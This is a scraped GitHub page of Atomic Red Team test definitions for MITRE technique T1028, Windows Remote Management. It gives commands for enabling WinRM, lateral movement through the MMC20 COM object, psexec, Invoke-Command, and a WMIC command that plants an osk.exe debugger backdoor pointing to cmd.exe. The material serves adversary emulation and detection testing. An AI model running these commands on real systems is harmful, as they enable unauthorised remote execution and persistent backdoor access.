Skip to content

Latest commit

 

History

History
146 lines (77 loc) · 3.53 KB

T1028.md

File metadata and controls

146 lines (77 loc) · 3.53 KB

T1028 - Windows Remote Management

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

Atomic Tests


Atomic Test #1 - Enable Windows Remote Management

Powershell Enable WinRM

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Enable-PSRemoting -Force


Atomic Test #2 - PowerShell Lateral Movement

Powershell lateral movement using the mmc20 application com object

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
computer_name Name of Computer string computer1

Attack Commands: Run with command_prompt!

powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")


Atomic Test #3 - WMIC Process Call Create

Utilize WMIC to start remote process

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
computer_name Target Computer Name String Target

Attack Commands: Run with command_prompt!

wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"


Atomic Test #4 - Psexec

Utilize psexec to start remote process

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
computer_name Target Computer Name String Target

Attack Commands: Run with command_prompt!

psexec \\host -u domain\user -p password -s cmd.exe


Atomic Test #5 - Invoke-Command

Execute Invoke-command on remote host

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
host_name Remote Windows Host Name String Test
remote_command Command to execute on remote Host String ipconfig

Attack Commands: Run with powershell!

invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}